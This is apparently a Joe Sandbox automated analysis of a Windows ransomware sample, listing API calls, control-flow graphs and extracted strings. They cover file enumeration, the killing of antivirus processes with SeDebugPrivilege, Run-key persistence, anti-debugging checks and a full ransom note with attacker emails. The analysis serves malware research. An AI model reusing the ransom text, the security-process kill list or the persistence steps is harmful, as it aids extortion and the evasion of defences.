__fread_nolock 26 API calls 53359->53361 53360->53359 53362 ea6f3b 53361->53362 53373 ea7dfb 53362->53373 53364 ea6f42 53365 ea3c8d __fread_nolock 26 API calls 53364->53365 53364->53367 53366 ea6f6e 53365->53366 53366->53367 53368 ea3c8d __fread_nolock 26 API calls 53366->53368 53369 ea6f7c 53368->53369 53369->53367 53370 ea3c8d __fread_nolock 26 API calls 53369->53370 53371 ea6f8c 53370->53371 53372 ea3c8d __fread_nolock 26 API calls 53371->53372 53372->53367 53374 ea7e07 __FrameHandler3::FrameUnwindToState 53373->53374 53375 ea7e0f 53374->53375 53376 ea7e27 53374->53376 53471 e9ca2a 20 API calls _free 53375->53471 53378 ea7ee4 53376->53378 53382 ea7e5d 53376->53382 53478 e9ca2a 20 API calls _free 53378->53478 53379 ea7e14 53472 e9ca3d 20 API calls _free 53379->53472 53385 ea7e7b 53382->53385 53386 ea7e66 53382->53386 53383 ea7ee9 53479 e9ca3d 20 API calls _free 53383->53479 53384 ea7e1c __wsopen_s 53384->53364 53405 eabdd1 EnterCriticalSection 53385->53405 53473 e9ca2a 20 API calls _free 53386->53473 53388 ea7e73 53480 e9c3ae 26 API calls __cftof 53388->53480 53391 ea7e81 53393 ea7e9d 53391->53393 53394 ea7eb2 53391->53394 53392 ea7e6b 53474 e9ca3d 20 API calls _free 53392->53474 53475 e9ca3d 20 API calls _free 53393->53475 53406 ea7f05 53394->53406 53399 ea7ea2 53476 e9ca2a 20 API calls _free 53399->53476 53400 ea7ead 53477 ea7edc LeaveCriticalSection __wsopen_s 53400->53477 53403->53357 53404->53367 53405->53391 53407 ea7f2f 53406->53407 53408 ea7f17 53406->53408 53410 ea8299 53407->53410 53415 ea7f74 53407->53415 53481 e9ca2a 20 API calls _free 53408->53481 53495 e9ca2a 20 API calls _free 53410->53495 53411 ea7f1c 53482 e9ca3d 20 API calls _free 53411->53482 53414 ea829e 53496 e9ca3d 20 API calls _free 53414->53496 53417 ea7f7f 53415->53417 53418 ea7f24 53415->53418 53423 ea7faf 53415->53423 53483 e9ca2a 20 API calls _free 53417->53483 53418->53400 53419 ea7f8c 53497 e9c3ae 26 API calls __cftof 53419->53497 53421 ea7f84 53484 e9ca3d 20 API calls _free 53421->53484 53425 ea7fc8 53423->53425 53426 ea800a 53423->53426 53427 ea7fee 53423->53427 53425->53427 53431 ea7fd5 53425->53431 53429 ea6049 __fread_nolock 21 API calls 53426->53429 53485 e9ca2a 20 API calls _free 53427->53485 53432 ea8021 53429->53432 53430 ea7ff3 53486 e9ca3d 20 API calls _free 53430->53486 53433 eae7a2 __fread_nolock 26 API calls 53431->53433 53435 ea4646 _free 20 API calls 53432->53435 53436 ea8173 53433->53436 53438 ea802a 53435->53438 53439 ea81e9 53436->53439 53441 ea818c GetConsoleMode 53436->53441 53437 ea7ffa 53487 e9c3ae 26 API calls __cftof 53437->53487 53442 ea4646 _free 20 API calls 53438->53442 53443 ea81ed ReadFile 53439->53443 53441->53439 53444 ea819d 53441->53444 53445 ea8031 53442->53445 53446 ea8261 GetLastError 53443->53446 53447 ea8207 53443->53447 53444->53443 53448 ea81a3 ReadConsoleW 53444->53448 53449 ea803b 53445->53449 53450 ea8056 53445->53450 53451 ea826e 53446->53451 53452 ea81c5 53446->53452 53447->53446 53453 ea81de 53447->53453 53448->53453 53455 ea81bf GetLastError 53448->53455 53488 e9ca3d 20 API calls _free 53449->53488 53454 ea8455 __fread_nolock 28 API calls 53450->53454 53493 e9ca3d 20 API calls _free 53451->53493 53468 ea8005 __fread_nolock 53452->53468 53490 e9ca07 20 API calls 2 library calls 53452->53490 53463 ea822c 53453->53463 53464 ea8243 53453->53464 53453->53468 53454->53431 53455->53452 53456 ea4646 _free 20 API calls 53456->53418 53459 ea8273 53494 e9ca2a 20 API calls _free 53459->53494 53461 ea8040 53489 e9ca2a 20 API calls _free 53461->53489 53491 ea7c2e 31 API calls 3 library calls 53463->53491 53467 ea825a 53464->53467 53464->53468 53492 ea7a86 29 API calls __fread_nolock 53467->53492 53468->53456 53470 ea825f 53470->53468 53471->53379 53472->53384 53473->53392 53474->53388 53475->53399 53476->53400 53477->53384 53478->53383 53479->53388 53480->53384 53481->53411 53482->53418 53483->53421 53484->53419 53485->53430 53486->53437 53487->53468 53488->53461 53489->53468 53490->53468 53491->53468 53492->53470 53493->53459 53494->53468 53495->53414 53496->53419 53497->53418
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(AB1AAB9C,755720D0,00000000,00000000), ref: 00E3DFDB
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,AB1AAB9C,755720D0,00000000,00000000), ref: 00E3E049
                                                                                                      • GetLastError.KERNEL32 ref: 00E3E060
                                                                                                      • GetLastError.KERNEL32 ref: 00E3E062
                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00E3E4F5
                                                                                                      • Sleep.KERNELBASE(00000005,00000000,00000000,00000000,?,?,?,?,?,?,boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt,0000005F), ref: 00E3EB54
                                                                                                      • FindNextFileW.KERNELBASE(?,00000010,?,boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt,0000005F), ref: 00E3EF1D
                                                                                                      • GetLastError.KERNEL32 ref: 00E3EF38
                                                                                                      • FindClose.KERNELBASE(?), ref: 00E3EF46
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FileFind$CloseCopyFirstNextSleep
                                                                                                      • String ID: .dll.exe.sys.mof.lnk$/Local Settings$7G$:/Games$:/Program Files$:/Program Files (x86)$:/ProgramData$:/Tor Browser$:/Users/All Users$:/Windows$All Users$AppData/Local$User Data/Default/cache$\Decryptfiles.txt$boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt$cache2/entries
                                                                                                      • API String ID: 250153273-973084934
                                                                                                      • Opcode ID: 35a0952843699c4af8d80d535e441db03441ca413e44358948e8ece302236ff4
                                                                                                      • Instruction ID: d1580ff4d55615e202faceb90d806fd39c854ae8aa748d0412a381ca1b0ca2e6
                                                                                                      • Opcode Fuzzy Hash: 35a0952843699c4af8d80d535e441db03441ca413e44358948e8ece302236ff4
                                                                                                      • Instruction Fuzzy Hash: E192BFB1A002188BDB28CB28CC897DDBBB5EB45308F5452DDE509B72C2DB759E88CF55

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E3ABC8
                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E3ABD9
                                                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 00E3ABF2
                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?), ref: 00E3AC99
                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E3ACA0
                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,00000004), ref: 00E3ACCE
                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000), ref: 00E3ACE3
                                                                                                      • GetLastError.KERNEL32 ref: 00E3ACED
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00E3ACFF
                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E3AD2E
                                                                                                      • TerminateProcess.KERNELBASE(00000000,00000001), ref: 00E3AD4F
                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00E3AD56
                                                                                                      • Process32NextW.KERNEL32(?,?), ref: 00E3AD82
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00E3AD96
                                                                                                      Strings
                                                                                                      • couldn't open process, xrefs: 00E3AD3A
                                                                                                      • SeDebugPrivilege, xrefs: 00E3ACC0
                                                                                                      • ,, xrefs: 00E3AC15
                                                                                                      • avpmapp.exe,econceal.exe,SecHealthUI.exe,RuntimeBroker.exe,escanmon.exe,escanpro.exe,TRAYSSER.EXE,TRAYICOS.EXE,econser.exe,VIEWTCP, xrefs: 00E3AC1F
                                                                                                      • could not set SE_DEBUG_NAME Privilege, xrefs: 00E3AD0C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CloseHandleProcess32$NextOpenToken$AdjustCreateCurrentErrorFirstLastLookupPrivilegePrivilegesSnapshotTerminateToolhelp32Value
                                                                                                      • String ID: ,$SeDebugPrivilege$avpmapp.exe,econceal.exe,SecHealthUI.exe,RuntimeBroker.exe,escanmon.exe,escanpro.exe,TRAYSSER.EXE,TRAYICOS.EXE,econser.exe,VIEWTCP$could not set SE_DEBUG_NAME Privilege$couldn't open process
                                                                                                      • API String ID: 1758721318-2112075363
                                                                                                      • Opcode ID: 379293b7f24b4870ce5297bb47918cda95649573975cbf4d66321633f0f9d921
                                                                                                      • Instruction ID: ec84fd54c9bac1f56b1313ce4ae99529bc7382b95da1b44ebde8dab62c549026
                                                                                                      • Opcode Fuzzy Hash: 379293b7f24b4870ce5297bb47918cda95649573975cbf4d66321633f0f9d921
                                                                                                      • Instruction Fuzzy Hash: AA519371900209DFEB20AF61DC49BAB7BB8FF14304F5451B5E909FA191E7B1DA84CB92

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1735 e784e0-e78520 1736 e78522-e7852a 1735->1736 1737 e7859e-e785b2 call e8d658 1735->1737 1738 e7858e-e7859d 1736->1738 1739 e7852c-e78542 call e8caa7 1736->1739 1737->1736 1744 e785b8-e785db call e8ca86 call e8d9a6 call e8d60e 1737->1744 1745 e785e0-e7862c call e8bfee 1739->1745 1746 e78548-e78554 1739->1746 1744->1736 1763 e78632-e7863b call e7af50 1745->1763 1764 e7862e-e78630 1745->1764 1750 e78556-e78569 call e8d73a 1746->1750 1751 e7857f-e7858c call e8cab8 1746->1751 1760 e78576 1750->1760 1761 e7856b-e7856d call e77ee0 1750->1761 1751->1738 1767 e78578-e7857e 1760->1767 1770 e78572-e78574 1761->1770 1768 e7863d-e78667 call e51c70 call e77ee0 call e784e0 1763->1768 1764->1768 1767->1751 1777 e7866c-e78679 BCryptGenRandom 1768->1777 1770->1767 1778 e786d4-e7870f call e784c0 SetLastError call e462b0 call e78020 call e8f18a 1777->1778 1779 e7867b-e7868b 1777->1779 1780 e78695-e786d1 call e7afb0 call e8d512 1779->1780 1781 e7868d-e78690 BCryptCloseAlgorithmProvider 1779->1781 1781->1780
                                                                                                      APIs
                                                                                                      • __Mtx_unlock.LIBCPMT ref: 00E78584
                                                                                                      • __Mtx_init_in_situ.LIBCPMT ref: 00E785BF
                                                                                                      • BCryptGenRandom.BCRYPT(00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78672
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78690
                                                                                                      • SetLastError.KERNEL32(00000000,00000000), ref: 00E786DE
                                                                                                        • Part of subcall function 00E78020: GetLastError.KERNEL32(AB1AAB9C,?,?), ref: 00E78068
                                                                                                        • Part of subcall function 00E8F18A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00E49A0A,?,00E8C15E,?,00EE3CB4,?,?,?,?,00E49A0A,AllocatorBase: requested size would cause integer overflow,AB1AAB9C), ref: 00E8F1EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptErrorLast$AlgorithmCloseExceptionMtx_init_in_situMtx_unlockProviderRaiseRandom
                                                                                                      • String ID: BCryptGenRandom
                                                                                                      • API String ID: 2882368933-3013187443
                                                                                                      • Opcode ID: c7df5633c92989fac635f7cf8f3ee3590cb2946ba163afcf0bfae183ea95fb84
                                                                                                      • Instruction ID: 60ab21ed4f64ae978e2c4cf4f3b3b552414cd98a286f50cf763989a47dbcdb51
                                                                                                      • Opcode Fuzzy Hash: c7df5633c92989fac635f7cf8f3ee3590cb2946ba163afcf0bfae183ea95fb84
                                                                                                      • Instruction Fuzzy Hash: E35104B1D40348AFDB10EBA4CD4AB9EB7F8EB14714F106169F819BB381EB719904CB61

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • BCryptOpenAlgorithmProvider.BCRYPT(?,RNG,Microsoft Primitive Provider,00000000,AB1AAB9C,00E38EA1), ref: 00E77F1E
                                                                                                      • SetLastError.KERNEL32(00000000,00E38EA1,?,?,?,?,?,?,?,?,?,?,?,00000000,00EB5EAD,000000FF), ref: 00E77F4D
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00E77FD2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AlgorithmCryptErrorLastOpenProvider___std_exception_copy
                                                                                                      • String ID: BCryptOpenAlgorithmProvider$Microsoft Primitive Provider$RNG
                                                                                                      • API String ID: 1783600949-2191745741
                                                                                                      • Opcode ID: 41004878eb077279cc7a630e884014adfeb31081eb9e560811feed439864d76b
                                                                                                      • Instruction ID: 8c864433a552a1f86717c90951390d0e411508dd71c622a7ccd24c162a1d1381
                                                                                                      • Opcode Fuzzy Hash: 41004878eb077279cc7a630e884014adfeb31081eb9e560811feed439864d76b
                                                                                                      • Instruction Fuzzy Hash: 62315AB2944709ABC714DF95DC46B9AB7FCFB18710F00562AE81AB3680EBB4A5048B90
                                                                                                      APIs
                                                                                                      • BCryptGenRandom.BCRYPT(00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78672
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,00000000,00000000,?,00000000,00000001,AB1AAB9C,?), ref: 00E78690
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Crypt$AlgorithmCloseProviderRandom
                                                                                                      • String ID:
                                                                                                      • API String ID: 807523545-0
                                                                                                      • Opcode ID: 5f1ae888b427cc96aaa220f454c64e8600f1b4cf55d25d91d43240c905455ac7
                                                                                                      • Instruction ID: c4e6ebc2259c25b059ae6f1e2f98db3309206084a3407b693fdd16bc5e7a4f52
                                                                                                      • Opcode Fuzzy Hash: 5f1ae888b427cc96aaa220f454c64e8600f1b4cf55d25d91d43240c905455ac7
                                                                                                      • Instruction Fuzzy Hash: 5021D1B0A04348AFDB14EFA4C949B9EBBF8FF54354F105129E819BB381DB709908CB91
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E705CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: 85b6361c3579246a34c1a5aaee0c4339ff82380f86807ca5d44a5c4c639b3961
                                                                                                      • Instruction ID: 7db93b873d1d20b243fb999388b00c53bac93267cb02f08c4d8b6863e93a153b
                                                                                                      • Opcode Fuzzy Hash: 85b6361c3579246a34c1a5aaee0c4339ff82380f86807ca5d44a5c4c639b3961
                                                                                                      • Instruction Fuzzy Hash: 4E52C071A00258CFCB14DF28C9847AEBBF5BF88304F55A559E84AAB392D730ED45CB91

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00E3AF10: RegOpenKeyExW.KERNELBASE(80000001,Software\SoftwareClient,00000000,00020019,?), ref: 00E3AF6D
                                                                                                        • Part of subcall function 00E3AF10: RegGetValueA.KERNELBASE(?,00ED385B,?,00000008,00000000,?,?), ref: 00E3AF91
                                                                                                      • GetTempPathA.KERNEL32(00000104,?,?,?,?,AB1AAB9C,00000000), ref: 00E3F40B
                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E3F6E4
                                                                                                      Strings
                                                                                                      • Contact us, xrefs: 00E3F585
                                                                                                      • All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key., xrefs: 00E3F4F5
                                                                                                      • email :edfr789@tutanota.com, xrefs: 00E3F59D
                                                                                                      • Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover, xrefs: 00E3F525
                                                                                                      • dQ, xrefs: 00E3F5C1
                                                                                                      • dQ, xrefs: 00E3F5D9
                                                                                                      • Don't worry, you can return your files! , xrefs: 00E3F4DD
                                                                                                      • we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned., xrefs: 00E3F53D
                                                                                                      • -> edfr789@tutamail.com, xrefs: 00E3F5B5
                                                                                                      • dQ, xrefs: 00E3F5A9
                                                                                                      • \Decryptfiles.txt, xrefs: 00E3F429
                                                                                                      • UID, xrefs: 00E3F34C
                                                                                                      • dQ, xrefs: 00E3F4E9
                                                                                                      • dQ, xrefs: 00E3F549
                                                                                                      • Attach this file in the email., xrefs: 00E3F5CD
                                                                                                      • dQ, xrefs: 00E3F591
                                                                                                      • ID :, xrefs: 00E3F5E5
                                                                                                      • ATTENTION!, xrefs: 00E3F4BD
                                                                                                      • dQ, xrefs: 00E3F501
                                                                                                      • dQ, xrefs: 00E3F519
                                                                                                      • Private, xrefs: 00E3F367
                                                                                                      • Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours., xrefs: 00E3F56D
                                                                                                      • The only method of recovering files is to purchase a decrypt tool and your key., xrefs: 00E3F50D
                                                                                                      • We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision., xrefs: 00E3F555
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Ios_base_dtorOpenPathTempValuestd::ios_base::_
                                                                                                      • String ID: -> edfr789@tutamail.com$ATTENTION!$All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key.$Attach this file in the email.$Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.$Contact us$Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover$Don't worry, you can return your files! $ID :$Private$The only method of recovering files is to purchase a decrypt tool and your key.$UID$We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.$\Decryptfiles.txt$dQ$dQ$dQ$dQ$dQ$dQ$dQ$dQ$email :edfr789@tutanota.com$we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned.
                                                                                                      • API String ID: 1070995017-2794862512
                                                                                                      • Opcode ID: f4194d94fc307e1b0acf30e1c9790936f0e92a59abfa4d5906ff0fc9a6f51108
                                                                                                      • Instruction ID: 7b06f382ef0bd1ddc492625c7b6d4951c14791d03e0a40b7b8521e4c70ecd066
                                                                                                      • Opcode Fuzzy Hash: f4194d94fc307e1b0acf30e1c9790936f0e92a59abfa4d5906ff0fc9a6f51108
                                                                                                      • Instruction Fuzzy Hash: 53C1D331A002149BDF18EBB4DC4A79EB7F2DB85300F1494B9E009BB396DA759E85CF85

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 387 e40f50-e40f7d 388 e40f83-e40f87 IsDebuggerPresent 387->388 388->388 389 e40f89-e40f8e call e40e40 388->389 392 e40f90-e40f94 IsDebuggerPresent 389->392 392->392 393 e40f96-e40fde GetModuleFileNameW RegOpenKeyExW Sleep 392->393 394 e40fe0-e40ffd RegQueryValueExW 393->394 395 e40fff-e41031 RegCreateKeyW RegSetValueExW 393->395 394->395 396 e41037-e410a9 RegCloseKey call e9ccd1 call e98795 call e98774 394->396 395->396 403 e410be-e410e3 call e8d73a 396->403 404 e410ab-e410b8 396->404 408 e410e5-e410ed 403->408 409 e41127-e4115d call e98ef7 403->409 404->403 411 e410ef-e41102 408->411 412 e4111a 408->412 415 e414c0-e414cc call e8c01b 409->415 416 e41163-e4116f 409->416 411->409 421 e41104-e41118 411->421 413 e4111d 412->413 413->409 419 e414d1-e414d3 call e8c01b 415->419 418 e41175-e41181 call e8bb4c 416->418 416->419 425 e414d8-e414df call e8bfee 418->425 427 e41187-e4119a 418->427 419->425 421->413 429 e411b0-e411b8 427->429 430 e4119c-e411ac 427->430 432 e411ce-e41367 RegOpenKeyExW 429->432 433 e411ba-e411ca 429->433 430->429 434 e41397-e413a9 RegCloseKey call e37c40 432->434 435 e41369-e41387 RegQueryValueExW 432->435 433->432 438 e413ae-e413dc call e3a1d0 434->438 435->434 436 e41389-e41395 RegCloseKey 435->436 436->438 441 e413e0-e413e4 IsDebuggerPresent 438->441 441->441 442 e413e6 call e3fa10 441->442 444 e413eb 442->444 445 e413f0-e413f4 IsDebuggerPresent 444->445 445->445 446 e413f6-e413fb call e3a1d0 445->446 449 e41400-e41404 IsDebuggerPresent 446->449 449->449 450 e41406-e414bf call e8f780 GetModuleFileNameW call e3aea0 CreateProcessW CloseHandle * 2 call e414e0 call e8d512 449->450
                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(AB1AAB9C,0000000F,?), ref: 00E40F83
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E40F90
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E40FA4
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00020019,?), ref: 00E40FCC
                                                                                                      • Sleep.KERNELBASE(00000064), ref: 00E40FD6
                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,XPSUDTARW,00000000,?,00000000,00000000), ref: 00E40FF5
                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00E41010
                                                                                                      • RegSetValueExW.KERNELBASE(00000000,XPSUDTARW,00000000,00000001,?,00000412), ref: 00E41031
                                                                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00E4103D
                                                                                                        • Part of subcall function 00E8BB4C: CloseHandle.KERNEL32(00000000,?,00E4117C,00000000,00000000), ref: 00E8BB52
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\SoftwareClient,00000000,00020019,00000000), ref: 00E4135F
                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,Private,00000000,?,00000000,00000000), ref: 00E4137F
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E4138F
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E4139D
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E413E0
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E413F0
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E41400
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E41430
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00E4147C
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E4148E
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00E41496
                                                                                                      Strings
                                                                                                      Memory Dump Source
